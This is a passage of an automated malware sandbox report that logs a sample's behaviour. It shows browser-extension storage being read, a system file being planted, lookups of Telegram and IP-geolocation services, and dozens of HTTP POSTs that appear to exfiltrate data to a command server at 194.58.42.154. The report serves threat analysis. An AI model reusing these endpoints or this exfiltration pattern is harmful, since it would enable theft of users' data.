                                  Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: based.exe, 00000004.00000002.2390904759.00007FFDFAB8C000.00000040.00000001.01000000.0000001D.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: based.exe, based.exe, 00000004.00000002.2392560474.00007FFDFAF31000.00000040.00000001.01000000.00000019.sdmp

                                  Spreading

                                  barindex
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00D9C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D9C4A8
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DAE560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00DAE560
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D017F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,1_2_00007FF67D017F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D017F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,1_2_00007FF67D017F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D021FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF67D021FE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D008B00 FindFirstFileExW,FindClose,1_2_00007FF67D008B00
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B32DCE0 FindFirstFileExW,2_2_000001F91B32DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272685A0 FindFirstFileExW,FindClose,2_2_00007FF7272685A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF7272679B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7272679B0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727280B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF727280B84
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A4DCE0 FindFirstFileExW,4_2_00000201D1A4DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272685A0 FindFirstFileExW,FindClose,4_2_00007FF7272685A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727280B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF727280B84
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF7272679B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF7272679B0
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior

                                  Networking

                                  barindex
                                  Source: unknownDNS query: name: api.telegram.org
                                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                  Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
                                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                  Source: unknownDNS query: name: ip-api.com
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 384Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 384Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1532Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1552Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1972Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1972Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1972Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: multipart/form-data; boundary=----eTwOLJhoufyL2P3BNzX1CU6eJZ78WmysxBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 135542Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1996Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1960Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1960Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1996Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1996Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1996Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
